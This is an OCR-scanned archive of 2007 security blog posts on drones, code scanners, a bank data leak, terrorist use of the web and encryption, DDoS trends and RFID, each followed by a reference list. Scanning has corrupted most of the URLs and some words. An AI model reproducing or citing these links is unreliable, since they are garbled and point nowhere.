potent strike fighter with the capabilities of a reconnaissance 
drone. 11 

You may also be curious on why the U.S Department of 
Agriculture is interested in buying some the way I am 

- perhaps a sci-fi insects invasion. What would the next 
logical evolution of UCAVs be? That's [5]UCAVs capable 

of electronic warfare attacks, and with their flight durability 
and flexibility of operation, the idea will receive more 
acceptance as the technology matures. There's also 
something else to keep in mind, and that's the interest and 

active [6]research of various terrorist organizations in UAVs. 
And while [7]they wouldn't sacrifice $7M for a drone, 

even be able to get hold of one - unless Iran supplies - cheap 
alternatives such as the [8]Spy X plane are already 

taken into consideration, at least for reconnaissance 
purposes. Yes they're cheap, and yes they're easy to jam, you 

can even hear them coming, but the trend is worth 
mentioning. 
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1. http://en.wikipedia.or a /wiki/Unmanned_aerial_vehicle 

2 . 

http://en.wikipedia.or a /wiki/Unmanned Combat Air Vehicle 








3. http://ddanchev.blo as DOt.com/2006/Q8/futuristic-warfare- 
technolo a ies.html 

4. http://www.afa.or a /ma a azine/ i an2007/0107UAV.as p 

5. 

http://www.aerosonde.com/downloads/Aerosonde DSTO EW. 

fodf 

6. http://sfir-arabicsource.blo as pot.com/2007/01/f1v-and-s pv- 
b v-wireless.html 

7. http://ddanchev.blo as pot.com/2006/Q9/hezbollahs-use-of- 
unmanned-aerial.html 


8. http://c a i.ebav.co.uk/Remote-Controlled-S p v-X-Plane-With- 
Dio ital-Camera WOO Q ifemZ 11008166242 8Q O ihZQ01O Oca 

teaor vZ191640 0 cmdZViewltem 
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Interactivity by Default (2007-02-06 19:38) 

Proud to be operating in a Web 2.0 world, I'm continuing to 
integrate features to make the reading of this blog more 

interactive, less time consuming, and much more easy to 
navigate. After [ljdel.icio.us and [2]TalkR, here comes 

[3]Snap : 

11 Snap Preview Anywhere enables anyone visiting your site 
to get a glimpse of what other sites you're Unking to, without 
having to leave your site. By rolling over any link, the user 



























gets a visual preview of the site without having to go there, 
thus eliminating wasted "trips" to linked sites. " 

Enjoy! 

1. http://del.icio.us/DDanchev?setcount=100 

2. http://www.talkr.com/a p p/cast pods.a p p?feed _id = 26043 

3. http://www.snap.com/ 
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Automated Detection for Patterns of Insecurities 
(2007-02-08 21:15) 

While there're lots of [ljpros and [2]cons to [3]consider when 
it comes to automated source code scanning, 

[4]Fortify's pricey automated source code analysis tool has 
the potential to prevent the most common vulnerabilities 

while the software's still in the development phrase. 

Recently, they've added [5]34 new categories of 
vulnerabilities 

to their product: 

" Thanks to this effort, Fortify Software continues to lead the 
industry by identifying over 150 categories of vulnerabilities 
in software. 

The updated Secure Coding Rulepacks include: * Increased 
breadth: 34 new distinct vulnerability categories. * 

Enhanced support for .NET: 24 new vulnerability categories 
and coverage for five new third-party libraries, including the 









Microsoft Enterprise Library. * Expanded JSP support: 
Coverage for popular tag libraries, including JSTL and 

Apache Struts, for enhanced protection from cross-site 
scripting and SQL injection attacks. * Detection of persistent 
Cross-Site Scripting vulnerabilities: Fortify SC A now detects 
one of the most common and difficult to identify forms of 
cross-site scripting, which occurs when malicious data from 
an attacker is stored in a database and later included in 
dynamic content sent to a victim. 11 

But how come small to middle size application vendors aren't 
really considering the use of such automated 

scanning tools? Overempowerment and trust in their 
developers' abilities? Not at all. The problem is the lack 

of incentives for them to do so, but what they're missing is a 
flow of soft dollars - a PR boost - if they were to 

communicate the efforts undertaken to ship their products 
audited, and hopefully, products free of brain-damaging 

bugs. 

In respect to the relatively immature market segment for 
software auditing, Fortify is perfectly positioned to 

even start fuzzing applications for their customers enjoying 
their almost pioneer advantage. Or even better, perhaps 

their customers should consider the concept for themselves. 
All rest is the endless full disclosure debate, researchers 
pushing for accountability, and vendors - legally - 
[6]thinking they're on war with them, fighting back however 
they 



can. You may also find a related post on how [7]prevalence of 
XSS vulnerabilities by Michael Sutton informative, and 

the [8]following posts worth [9]the read as well. 
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The bottom line question - [10]Can Source Code Auditing 
Software Identify Common Vulnerabilities? It sure can, but 
never let a scanner do a developer's job or forward 
[lljsecure coding practices to a third-party. 

1. http://osvdb.or a /blo a/? o=107 

2 . 

http://www.codescan.com/Librarv/Source Code Scanners Th 
e Case.pdf 

3. 

http:// i eremiah a rossman.blo as pot.eom/2007/01/automated- 
scan ner-vs-owasp-top-ten.html 

4. http://www.fortifvsoftware.com/ 

5. 

http://www.earthtimes.or a /articles/show/news_press_release . 

52123.shtml 

6. http://en.wikipedia.or a /wiki/Michael_Lvnn 

7. 

http://portal.spidvnamics.eom/blo a s/msutton/archive/2007/0 
1/31/How-Prevalent-Are-XSS-Vulnerabilities 3F00 . 

aspx 

8. http://ddanchev.blo as pot.com/2006/Q7/scientificall v- 
predictin a -software.html 
































9. http://ddanchev.blo as pot.com/20Q7/01/four-vears-of- 
ap plication-pen-testin a .html 

10 . 

http://csdl.computer.or a /com p/ proceedin a s/hicss/2004/2056/ 
09/205690277 . pdf 

11. http://www.blackhat.com/presentations/bh-europe-06/bh- 
eu-06-Wheeler-u p.pdf 
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Receiving Everyone's Financial Statements (2007-02- 
08 22:16) 

Bank institutions around the world - stay tuned for 
[l]wannabe identity thieves requesting their statements 
while 

hoping you'll forward them everyone else's ones, in between. 
Smells like an over performing intern to me : 

11 An Aberdeen woman who asked for her bank statement 
was sent details of 75,000 other customers. Stephanie 

McLaughlan, 22, was sent the financial details by Halifax 
Bank of Scotland (HBOS). She received five packages 

each containing 500 sheets of 30 customers' names, sort 
codes and account details. HBOS apologised and said 

it was carrying out an investigation. The Information 
Commissioner's Office (ICO) said it would probe the 
"negligence. " 


















Obviously, you can too play the [2]U.S Department of 
Treasury requesting [3]financial information [4]from the 

[5]SWIFT, but in this case - unintentionally. 

1. 

http://news.bbc.co.Uk/l/hi/scotland/north east/6310633.stm 

2 . 

http://www.financialcr vptoaraph v.eom/mt/archives/000764.h 

tml 


3. 

https://financialcr vptoaraph v.com/mt/archives/0008Q4.html 

4. 

http://www.europarl.europa.eu/hearin a s/20061004/libe/back 
a round swift en.pdf 

5. 

http://ec.europa.eu/ i ustice home/fs i/ privacv/news/docs/PR S 
wift_Affair_28_07_06_en.pdf 
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Overachieving Technology Companies (2007-02-12 
13:39) 

Great dataset by Forbes - [l]The 25 Fastest-Growing Tech 
Companies : 

11 Our selection process: We require at least $25 million in 
sales, 10 % annual sales growth for five consecutive years, 
profitability over the past 12 months and 10 % estimated 
annual profit growth for the next three to five 



















years. We exclude firms with significant legal problems or 
other open-ended liabilities and also consider accounting and 
corporate governance scores from Audit integrity of Los 
Angeles in making our final cuts. " Growth has many 
dimensions, and with any market's cyclical pattern it's 
important to assess the potential for sustainable long-term 

growth based on easy to influence market factors, as the 
balance of power in the tech market can sometimes change 

very quickly. Being a pioneer doesn't always count as the 
best alternative, and it's the companies able to differentiate 
among fads and emerging trends, the ones worth assessing. 
Diversification in market sectors with higher liquidity 

such as anti virus and perimeter defense, or making a long¬ 
term investment, that is positioning yourself as the default 
destination for a need that's only emerging for the time 
being remain rather popular - and predictable - strategic 

business moves. [2]Leadership, vision, and courage matter, 
but [3]money when it comes to innovation doesn't. Let's 

discuss several companies worth mentioning whatsoever: 

Google 

Don't say cheese, say Google. The company's continuing to 
please market analysts with steady profits, whose stock 

ratings bring more investors' cash into the GoogleMachine 
and with the re-emerging - this time [4]more mature - 

online advertising market bidding for keywords in a world of 
searching will remain profitable, the question every 

wonders is - until when? The naysayers, or the ones who 
couldn't obtain any Google shares constantly talk about 



several buzz words - decline in online advertising, click fraud, 
and index poisoning. And despite the fact that Yahoo's web 
properties may be attracting more traffic than Google's, 
Google's [5]KISS principle and their vision to set quality 
search results and up-to-date index of the Web as a core 
competency in times when the Web is growing faster than 
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ever before, is an incentive for advertisers and users to both 
trust, and do business with the company. Google may not 
have a market capitalization as high as Microsoft, but the 
flow of soft dollars, Google's shares as a fringe benefit and a 
bargain are winning more respect, attracting quality HR, and 
if that's not enought, disrupting and making the 

world a much more transparent place to live in. Now that 
sounds much better than a company that's always been 

earning over 50 % of its revenues from its oldest products - 
that's boring profitability. 


Salesforce.com 



The on demand concept in action. Need processing power? 
Outsource. Need a large snapshot of the Web? 

Outsource. The very idea of outsourcing a task to someone's 
that's specializing in the area is a more cost effective 

way then you'll ever do, is major driving force. Besides all, 
why create a new CRM system or even advertising 

system, when there're standardized and already developed 
and ready to use ones? Salesforce.com is a true case 

study signalling the trend, and with the company 
empowering developers to contribute concepts, it's a win- 
win-win 

situation for everyone involved. Read more [6]here. 

WebEx Communications 

Some Internet services are often taken for granted, and they 
should be, but the companies that provide these 

commoditized benefits such as video conferencing, are 
always in the position to generate steady cash flow. Take 

WebEx Communications. Video conferencing was supposed 
to revolutionize the way people communicate and do 

business. Have you seen a decline in 1st class business 
travel, or has your company kindly asked you to start video 

conferencing with potential customers in order to cut costs? 
Now, who'll do business with a salesforce whose 

elevator pitch cannot be verified in the elevator in a face-2- 
face meeting anyway? Trust me, not the type of people 



you'll feel proud and secure to do business with. It's all about 
the targeted audience and who'll benefit most from 

the service in a specific time, and in a specific market cycle. 
Seems like WebEx are either good at sensing the market, or 
it's the very nature of the service and the level of brand 
awareness they've achieved when it comes to online video 
conferencing. 

Websense 

Web filtering was a rather hot market segment couple of 
years ago when there was much more transparency in the 

dark corners of the Web. An URL containing information 
corporate users didn't really needed to be more productive 

was easy to spot, and the static nature of the Web compared 
to today's dynamically changing malicious sites was 

making it easy for the vendor to filter out the bad sites. 

[7] Real-time evaluation, or sandboxing a site came into play, 

[8] Web 2.0 "wisdom of crowds" [9]SiteAdvisor started 
getting acceptance, [10]Scandoo is slowly gaining ground, 
vendors such as [ll]ScanSafe diversifying already. So how is 
Websense still able to generate such revenue flows? The 

secret is in their sales force able to not only acquire new 
customers, but to most importantly retain their major ones, 
and of course diversification in market sectors such as data 
theft prevention. And like companies such as Google, 

Amazon and Ebay, [12]Database as the "Intel Inside" is a 
major differentiator and can close a lot of deals. 


To sum up - don't disrupt in irrelevance. 



1. http://www.forbes.com/2007/01/25/fastest- a rowin a -stocks- 
tech cz om i r_0125fasttech_land.html 

2. http://del.icio.us/DDanchev/Leadershi o 

3. http://ddanchev.blo as pot.com/2006/07/thin a s-mone v- 
cannot-buv.html 

4. http://del.icio.us/DDanchev/NewMedia 

5. http://en.wikioedia.or g /wiki/KISS principle 

6 . 

http://www.businessweek.com/smallbiz/content/feb2007/sb2 

0070205 196586.htm?chan=technolo a v technolo a v+index 

+ oaa e software 

7. http://www.explabs.com/linkscanner/ 

8. http://ddanchev.blo as pot.com/2006/02/look-whos- a onna- 
cash-for-evaluafin a .html 

9. http://ddanchev.blo as pot.com/2006/04/spottin a -valuable- 
investments-in.html 


10. http://www.scandoo.com/ 

91 

11. http://www.networkworld.com/news/2007/020507- 
scansafe.html 

12 . 

http://websense.com/ a lobal/en/ProductsServices/MasterData 

base/ 
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Forensic Examination of Terrorists' Hard Drives 
(2007-02-13 04:09) 

During the [ljlast year I presented [2]my point of view on 
[3]the topic in numerous posts, in order to debunk 

the common misunderstanding of [4]Cyberterrorism as an 
[5]offensive concept. And while real-time [6]cyber 

intelligence can save lifes, a historical forensic examination 
like the this one may act as a case study to further model the 
behaviour of a terrorists before they strike. Here's a list worth 
looking up at Archive.org, courtesy of the now 

deceased [7]Madrid bomber Jamal Ahmidan : 

" The below is a list of web sites found to have been visited 
by Ahmidan or accomplices. The list is not inclusive, but 
merely represents those sites in the indictment the names of 
which the author recognized based on dose to five years of 
routine monitoring ofjihadist activity online. Quite a few of 
these sites were likely to have been "under surveillance" 

during the time when Ahmidan and/or his associates 
accessed them. Had their IP addresses been reported to 
Spanish 

authorities at the time these sites were accessed, and had 
the authorities in Spain then followed up on such reports, it 
is entirely reasonable to expect that the Madrid bombing of 
11 March 2004 could have been prevented. " 

Cyberterrorism is so not overhyped, it's just a concept 
discussed from the wrong angle and that's the myth of 


terrorists using electronic means for killing people. A 
terrorists' training camp is considered a military target since 
it provides them the playground to develop their abilities. 
Sooner or later, it will feel the heat and dissapear from 

the face of the Earth, they know it, but don't care mainly 
because they've already produced and are distributing 

[8]Spetsnaz type of video training sessions. So abusing 
information or [9]the information medium itself is much more 

powerful from their perspective then destroying their means 
for communication, spread propaganda, and obviously 

recruit. [10]Real-time open source intelligence and accurate 
risk assessment of specific situations to prioritize the 

upcoming threat given the [ll]growing Jihadist web, is what 
should get more attention compared to data retention 

and data mining. 

Meanwhile, in the real world, events across the globe are 
sometimes reaching the [12]parody stage. [13]Know your 

enemy, and [14]don't underestimate his [15]motivation. 

1. http://ddanchev.blo as pot.com/2006/05/techno- 
imperiaiism-and-effect-of.html 

2. http://ddanchev.blo as pot.com/2006/10/cost-benefit- 
analvsis-of-cvber.html 

3. http://ddanchev.blo as pot.com/2006/08/ste a ano araphv- 
and-cvber-terrorism.html 


4. http://del.icio.us/DDanchev/Cvberterrorism 

















5. http://ddanchev.blo as pot.com/2006/10/scada-securit v- 
inddents-and-critical.html 

6. http://ddanchev.blo as pot.com/2006/Q9/cvber-intelli a ence- 
c vberint.html 

7. http://www.sofir.Qr a /sarchives/005905. php 

8. http://www.spetsnaz- a ru.com/ 
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9. 

http://photosl.blo aa er.com/blo aa er/1933/1779/1600/Cvbert 

errorism. ioa 

10. http://ddanchev.blo as pot.com/2006/09/benefits-of-open- 
source-intelli a ence.html 

11. http://ddanchev.blo as pot.com/20Q6/12/current-state-of- 
internet- i ihad.html 

12. http://www.colle a ehumor.eom/video:1741589 

13. http://ta i deed-list.net/ pj permail/pir ta i deed- 
list.net/2006- l une/000092.html 

14. http://www.sciencedirect.com/science? 

_ob = Mlm a &_ima a ekev ^B6WGR-4M7VFR.8-1 - 
1 <S-: cdi = 6829& user=10& ori a = browse 

& coverDate=01/31/2007& sk=999349998&view=c&wch p 

=dGLbVz 


15. http://ddanchev.blo as pot.com/20Q6/12/di a ital-terrorism- 
and-hate-2006-cd-rom.html 
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Gender Based Censorship in the News Media (2007- 
02-13 17:48) 

[1] 

Great perspective. The author Dr. Agnes Callamard even got 

the data to prove it. Limiting the freedom of expression for 
the sake of securing political or economic investments 

- so realistic. When it comes to gender based censorship, 
things have greatly changed during the last decade if 

you keep an eye on Fortune's [2]Most Powerful Women stats. 
Sexism is so old-fashioned, and diversity among top 

management has been taking place for a while, moreover, 
professional oriented women next to the family oriented 

ones are increasing - my type - but then again if all men are 
alike, and all women too, look for the exceptions. And 

by the way, since when does [3]age became a benchmark for 
a quality point of view or a criteria for knowledge, 

stereotypes keep you - the baby boomers - blindly 
protected, now aren't they? Trouble is, some evolve faster 
then 

you'll ever do, because you are your own benchmark in times 
when opinionated self-starters make an impact on a 

daily basis. Success is a state of mind, gender doesn't matter 
and never did : 


" In particular, the results of the GMMP 2005 show and 
ARTICLE 19's own work confirms that censorship can 

be the handmaiden of gender-based power, discrimination 
and inequality and further, that this type of censorship 

may be exercised via and by the media. This gender-based 
censorship is comprised of dynamics that are both 

systematic and selective in nature, explicit and implicit by 
expression, intentional and unintentional in outcome and 
both deliberate and thoughtless in impact. It expresses itself 
in many shapes, colours, and voices. But ultimately, like all 
other forms of censorship, it alters reality, dis-empowers, 
controls, renders invisible, and silences. " 

I'm still sticking to my point that if girls/women didn't hate 
each other so much, or let's say be less jealous of 

one another they could rule the world - they do rule the 
world as a matter of fact, but compared to posers media 

whoring on a daily basis, I'm convinced they're the true 
puppet masters behind the curtains, now aren't they? Just a 

thought. 

1. http://www.articlel9.or a/ pdfs/publications/ a ender-women- 
s-da v-pa per-2006.pdf 

2 . 

http://monev.cnn.com/ma a azines/fortune/mostpowerfulwom 

en/2006/ 

3. 

http://monev.cnn.com/ma a azines/fortune/mostpowerfulwom 
en/2006/a a e/i ndex.html 
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Emerging DDoS Attack Trends (2007-02-14 00:27) 

In a [l]previous post I emphasized on the long-term trend of 
how DoS attacks have the potential to cause as much 

damage as a full-scale DDoS attack, and increase their 
chance of not getting detected while require less resources. 

Looks like [2]Prolexic Technologies are thinking in the same 
direction and warning that: 

11 IT security bosses will have to be increasingly vigilant in 
2007 as criminals exploit new ways of ensuring distributed 
denial of service (DDOS) attacks cause the maximum 
damage and circumvent filtering technology, according 

to DDOS protection specialist Proiexic. While there will 
continue to be large-scale consumption-based attacks this 
year, attackers have learned that smaller, customised 
attacks tailored to web servers' application logic can have 
similar effects but require smaller botnets to generate, 
according to Proiexic president Keith Laslop." The requests 
will bring 

your CPU usage up to 100 percent by doing things 
like registering as a new customer 11 he said. "There is a 
stow frequency of requests so it will not trigger third-party 
[detection] technology, and intrusion-detection systems are 
not designed to notice these attacks. " 

[3]Attacks like these while not conducted by malicious 
parties, are already happening at Britain's Prime Minis- 


ter web site, though these should have been anticipated 
earlier. 

As always, assessing risk as if you are a part of a red team 
provides the best security for your network. Think 

malicious attackers. If they're able to fingerprint the software 
running on your boxes and get under the skin of your 
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web applications, a surgical and specifically crafted DoS 
attack would not only require less resources compared to a 
DDoS one, but would also make it a little bit harded for 
incident forensic investigator to react in a timely manner. So 
while you're preparing for a constant Gbytes stream, 
attackers will shift tactics. 

Here's [4]more info on the recent - totally futile - [5]attempt 
to attack the [6]root domain servers. 

1. http://ddanchev.blo as pot.com/2006/Q2/war-a a ainst- 
botnets-and-ddos-attacks.html 

2. http://www.prolexic.com/news/20070129-itweek. php 

3. 

http://www.dailvmail.co.uk/ paa es/live/articles/news/news.ht 
ml?in article id=435693&in pag e id = 1770&am p:amp: 

amp: ico=Home paa e&icl=TabModule&icc=NEWS&ct=5 

4. 

http://dnsmon.ripe.net/dns-servmon/domain/plot? 

domain = root&dav=5&month = 2&vear=2QQ7&hour=16&peri 

od=48h&plo 
























t%2F = SH0W 


5. http://isc.sans.or a /diar v.ph p7storvid = 2184 

6 . 

http://www.cbsnews.com/stories/2007/02/Q6/tech/nnain2440 

487.shtml 

97 




She Loves Me, She Loves Me Not (2007-02-14 23:13) 

I'm in love, with myself at the first place, and while Saint 
Valentine's meant to reboot a relationship so to speak, 

every day should be a Saint Valentine's day in a relationship. 
Do you [l]trip on love? [2]Malware authors always 

[3]do around the [4]14th of February. 

Quote of the day - No promises, no demands, [5]love is a 
battlefield - [6]or drug like addiction? Via [7]Tech _Space. 

1 . 

http://www.lvricsondemand.eom/soundtracks/c/cruelintentio 
nslvrics/tri ponlovelvrics.html 

2. http://isc.sans.or g /diar v.ph p7storvid = 2241 

3. http://www.informationweek.com/news/showArticle. i html? 
articl el D= 197006139&subSecti on = Breakin g + News 

4. http://www.f-secure.eom/weblo g /#00001112 

5. 

http://www.stlvrics.com/lvrics/13 g oin g on30/loveisabattlefield 

.htm 






























6 . 

http://online.ws i .com/public/article print/SBl 171310679304 
Q6235-bGv4cOTRO I G9Lm7vGQ7vGevbHlM 20080212.htmi 

7. 

http://blo a s.usatodav.com/techspace/2007/02/coffee break f 
e 7.html 
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Censorship in China - An Open Letter (2007-02-14 
23:38) 

An [l]open letter to Google's Founders regarding the 
censorship of search results in China : 

11 During the National Day holiday week in 2002, when 
Google.com was blocked in China for the first time, Chi¬ 
nese Google users made an online protest spontaneously 
They appealed to free the purer search engine wave by 

wave, its seemed its also the first time grassroots power was 
demonstrated in China on Internet. You can imagine 

how eager they are to have a complete Internet instead of a 
shrunken one. At last, people won, Google backed. 

However, after 4 years, we started to question whether we 
should continue to support Google. Many users here were 

disappointed when they found Google.cn filtered many 
keywords. The compromise remarks by you in Davos made 
us 















more frustrated. Seems you are adopting self-censorship 
which hurts those loyal users a lot which also devalue your 
motto of "non-evil". 11 

Issues to keep in mind: 

- Yahoo and Microsoft are doing it too in order to continue 
their business operations in China 

- Google is alerting the searcher that the results are filtered 
because the ghost of Mao is alive and kicking and said so 

- [2]Google's losing market share in China's search market 
next to Sina.com due to [3]censorship concerns, while local 
users are forgetting that Sina.com too is censoring the 
results, even worse, not even crawling as deep as Google is 
in respect to the quality of search results 

- U.S [4]Congressman Chris Smith has the issue on his 
agenda 

- [5]Technology companies are seeking government 
assistance on how to stop the [6]ongoing censorship 
themselves 

- The [7]complete list of censored search results is worth 
going through 

- [8]Google's and Yahoo's shareholders are fighting back 

- [9]The Great Firewall is cracking from within with banned 
journalists now running the largest blogging network in 

China 

1. http://www.isaacmao.com/nneta/2007/02/open-letter-to- 
a oo a le-founders-to-save.html 





2. http://business. a uardian.co.Uk/stor v/Q.. 1999900 . 00.html 


3. 

http://radar.oreillv.com/archives/2007/02/an open letter.html 

4. 

http://www.infoworld.com/article/07/02/12/HNcon a ressmanc 
hinaethics l.html 

5. http://www.post- a azette.com/ pa /07035/758377-96.stm 

6. http://arstechnica.com/news.ars/post/2007Q131- 
8739.html 

7. http://ddanchev.blo as pot.com/2006/08/chinas-internet- 
censorship-report-2006.html 

8. http://ddanchev.blo as pot.com/20Q6/12/ a oo a le-and- 
vahoos-shareholders-a a ainst.html 

9. http://ddanchev.blo as pot.com/20Q7/01/its-all-about- 
vision-and-coura a e-to.html 
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RFID Tracking Miniaturization (2007-02-15 01:07) 

First it was [ 1 ]RFID tracking ink, now with the introduction of 
the new generation Hitachi mu-chips, miniaturization 

proves for yet another time it has [2]huge privacy 
implications : 

" On February 13, Hitachi unveiled a tiny, new "powder " type 
RFID chip measuring 0.05 x 0.05 mm — the smallest yet — 

































which they aim to begin marketing in 2 to 3 years. By relying 
on semiconductor miniaturization technology and using 
electron beams to write data on the chip substrates, Hitachi 
was able to create RFID chips 64 times smaller than their 
currently available 0.4 x 0.4 mm [3] mu-chips. Like mu- 
chips, which have been used as an anti-counterfeit measure 
in admission tickets, the new chips have a 128-bit ROM for 
storing a unique 38-digit ID number." 

I will spare you the acronym as I'm sure you know which 
intelligence agency is sitting on the world's largest budget, 
but just a wake up call that all technologies that are just 
getting commercialized or a first mention in the mainstream 
media have already been developed, even abondoned for 
more advanced alternatives by this agency years ago - 
despite the 

fact that Hitachi is a Japanese company it's an U.S agency 
I'm talking about. [4]OSI are definitely remembering the 

old school days now. Picture courtesy of Hitachi comparing 
the chip's size next to a grain of rice. 

UPDATE: [5]Slashdot picked up the story. 

1. http://www.informationweek.com/news/showArticle. i html? 
a rticl el D= 196802844 

2. http://www.pinktentacle.com/2007/02/hitachi-develops- 
rfid-powder/ 

3. http://www.hitachi.co. i p/Prod/mu-chi p/ 

4. 

http://en.wikipedia.or g /wiki/Office of Scientific intelli g ence 


5. http://vro.slashdot.or g /article.pl7sid = 07/02/15/1715210 
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The Electronic Frontier Foundation in Europe (2007- 
02-15 16:29) 

[l]Couldn't get any better: 

11 The Electronic Frontier Foundation (EFF) opened a new 
office in Brussels today to work with various institutions of 
the European Union (EU) on innovation and digital rights, 
acting as a watchdog for the public interest in intellectual 
property and civil liberties policy initiatives that impact the 
European digital environment. The new EFF Europe office, 
made possible by the generous support of the Open Society 
Institute and Mr. Mark Shuttleworth of the Shuttleworth 

Foundation, will allow EFF to have an increased focus on the 
development of EU law. EFF also plans to expand its efforts 
in European digital activism and looks forward to working 
with many groups and organizations to fight effectively for 
consumers' and technologists' interests. " 

Finally [2]EDRI got some serious back-up on the frontlines. 

1. http://www.eff.or g /news/archives/2007 02. ph p#005111 

2. http://www.edri.or g/ 
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Terrorism and Encryption (2007-02-16 20:44) 

[ 1 ]Jihadist themed encryption tool - using "infidel" 
algorithms : 






" The program's 'portability' as an application (not requiring 
installation on a personal computer) will become an 
increasingly desirable feature, especially considering the 
high use of Internet cafe worldwide by pro-terrorist Islamic 
extremists,' said /Defense Middle East analyst Andretta 
Summerville. 'Mujahedin Secrets,' which can be downloaded 

for free, offers 'the five best encryption algorithms, with 
symmetrical encryption keys (256 bit), asymmetrical 
encryption keys (2048 bit) and data compression,' according 
to a translation of a Global Islamic Media Front's 
announcement about the software on Jan. 1, provided by 
Middle East Media Research Institute. " 

I've previously covered in-depth the topic of 
[2]steganography and terrorism, and provided an example 
while assessing 

the threat - and hype - level of the [3]Technical Mujahid. 
Terrorists have this problem with the infidels, pretty much 
everything they use starting from the Internet and their 
cellphone, even software running on a computer is "Made 

in InfidelLand". So I presume someone's not really 
comfortable with even encrypting their data with a U.S made 
PGP 
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software, so re-branding and adding a Jihadist theme seems 
to be the solution at least when PSYOPS count. [4]More info 
on the topic. 

1 . 

htto://news. monstersandcritics.com/usa/features/articl el 2 5 

3544. ph p/Cvber- i ihadis_use_of_encr v ption 







2. http://ddanchev.blo as pot.com/2006/08/ste a ano araphv- 
and-cvber-terrorism.html 

3. http://ddanchev.blo as pot.com/2006/12/analvsis-of- 
technical-mu i ahid-issue-one.html 

4. 

http://www.cs. a eor a etown.edu/~dennin a /cr v pto/cases.html 
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Delicious Information Warfare - Friday 16th (2007-02- 
16 22:24) 

Here are some articles and blog posts worth reading plus the 
related comments. [l]Previous [2]summaries as [3]well. 

[4] lslamic Terrorism from Clearguidance.com to 
lslamicnetwork.com - very interesting reading regarding 
Daniel 

Joseph Maldonado, and a visionary quote "It takes a 
community to make a terrorist and it only take a handful of 

people to build and maintain such communities." 

[5] Former DuPont senior scientist pleads to 
corporate espionage - fresh case of corporate espionage. 
As always I find it a totally biased opinion with companies 
falling in love with their trade secrets, even coming up with 
numbers 

as high as $400M 

[ 6 ] lnformation warfare, psyops, and the power of 
myth - decent article on the topics in today's world of war 















on ideologies 


[7] Glitches plague NSA f s effort to track terrorists 
online - Tracking terrorists online courtesy of the NSA's 
Turbulence program is a another $500M failure to 
understand the dynamics of cyberterrorism. Thankfully, 
there're third-party 

organization the NSA is definitely listening to and obtaining 
its intelligence giving the lack of ethnical diversity in the U.S 
intelligence community, one that is crucial nowadays. The 
cuttest quote of the day "Inside the agency, 

Turbulence's sensitive activities are sequestered behind 
passwords known to few." 

[ 8 ] Panda Software Releases Malware Radar, the First 
Automated Malware Audit Service - not necessarily the 
first as pretty much all vendors offer [9]online malware scan, 
but it's a product line extension based on recent licensing 

deals of Panda with other vendors 

[10]Another Malware protection engine becomes 
Malware enabler engine - when the [Insecurity solution 
ends 

up the security problem itself 

[12]Hackers target the home front - great example of 
targeted email attacks, makes you wonder two things - 
what's the chance the attacks aren't really systematic but 
basically rather regular malware infection attempts, or the 
emails of top management or anyone @bank.com have been 
available to attackers wanting to take advantage of the 
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insecurities of their home PCs 


[13] Turkish hacker strikes Down Under - Why shared 
hosting is unserious from a security point of view 

[14] 'Storm f Worm Touches Down on IM - [15]Storm 
Worm piece of malware switching vectors, interesting, but a 

fact demonstrating the novice experience of the malware 
author, as if it were an experienced one, the feature would 

have been build in the very first releases compared to mass 
mailings only 

[16]Top 10 Disrupters of 2006 - catchy slide show and 
here's [17]the full story 

[18]Microsoft f s Patches - [19]Zero day Wednesday took 
place as well 

[20]Russia f s Ivanov slams U.S. missile shield plans in 
Europe - the proposed U.S missile shield in Eastern Europe 
would give Russia the excuse to do something naughty 
[21 ]Iike this 

[22]Cyber officials: Chinese hackers attack 'anything 
and everything' - Chinese script kiddies generating noise 
so that the [23]advanced and government backed espionage 
attempts remain to be sorted through the noise - 

predictable pattern 

[24]Cuban Information Minister Blasts US Digital 
Espionage - Cuba to the U.S - Stop using OSINT and data 
aggregation techniques against us, as you see, we don't 
know how to Google 



[25] The Next Big Ad Medium: Podcasts - unless 
measurability improves it's all shooting into the dark for 
advertisers, and ad budget allocation dream come true for 
publishers 

[26] How to Stalk Your Family - start by self-regulation, 
everyone? 

[27] Text of Email to all Yahoos - Yahoo's CFO to all 

Yahoos, now if an average Yahoo is able to understand the 

corporate talk I'll bring the beer 

[28] China f s Submarine Fleet Continues Low Patrol 
Rate - outstanding analysis 

[29] Google Agrees to Buy Adscape - Google's getting 
into the [30]emerging in-game advertising market. Would a 

gaming company find that the lack of ads in its game can 
turn into a competitive advantage in the long-term? 
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[31] Yahoo co-founder Jerry Yang to donate $75 million 
to Stanford - never forget who you are and where you 
came from. Jerry Yang is donating $75M to Stanford 
University which as a matter of fact is largely financed by ex- 
disruptors, and yes tuition fees. They even hold quite some 
Google shares 

[32] CIA's secret prisons - [33]full coverage 

1. http://ddanchev.blo as pot.com/2006/06/delicious- 
i nformation-warfare-1324.html 

2. http://ddanchev.blo as pot.com/2006/06/delicious- 
information-warfare-2427.html 








3. http://ddanchev.blo as pot.com/2006/ll/delicious- 
information-warfare-fndav.html 

4. http://www.ha a anah.or a .il/harchives/005915.html 

5. http://www.delawareQnline.com/a p ps/pbcs.dll/article? 
AID=/20070215/NEWS/70215018 

6 . 

http://online i ournal.com/artman/publish/article_1754.shtml 

7. http://www.chron.com/diso/storv.mpl/nation/4551586.html 

8. http://biz.vahoo.com/prnews/070215/lath041.html?.v=86 

9. http://www.malwareradar.com/audits/what is/ 

10. http://blo a s.zdnet.com/Ou/?p=426 

11. http://www.linuxsecuritv.com/docs/malware-trends.pdf 

12 . 

http://technolo av.a uardian.co.uk/weeklv/stor v/0.. 2012712 .0 

O.html 

13. 

http://www.there a ister.co.uk/2007/02/15/iskorpitz hacks nz/ 

14. http://www.eweek.eom/article2/0 . 1759 . 2095572 . 00.as p? 
kc=EWRSS03129TXlK0000614 

15. http://ddanchev.blo as pot.com/2007/01/social- 
en a ineerin a -and-malware.html 

16. http://www.forbes.com/20Q7/01/22/leadership-disrupter- 
voutube-lead-innovation-cx he Q1221ede sllide.html 
















































17. http://www.forbes.com/20Q7/01/22/leadership-disrupter- 
voutube-lead-innovation-cx he Q1221ede.html 


18. http://isc.sans.or g /diar v.ph p7storvid = 2232 

19. http://www.securitvfocus.com/brief/43 

20. http://en.rian.ru/world/20070209/60466486.html 

21 . 

http://www.spacewar.com/reports/Russia Mav Unilaterall y 0 
uit INF Treaty 999.html 

22. http://www.fcw.com/article97658-02-13-Q7-Web 

23. http://ddanchev.blQ as pQt.com/2006/09/bi aa est-militar v- 
hacks-of-all-time.html 

24. 

http://www.ahora.cu/en a lish/SECTIQNS/national/2007/februa 

r v/14-02-07.htm 

25. 

http://www.businessweek.eom/technolo a v/content/feb2007/t 
C20070214 915949.htm 


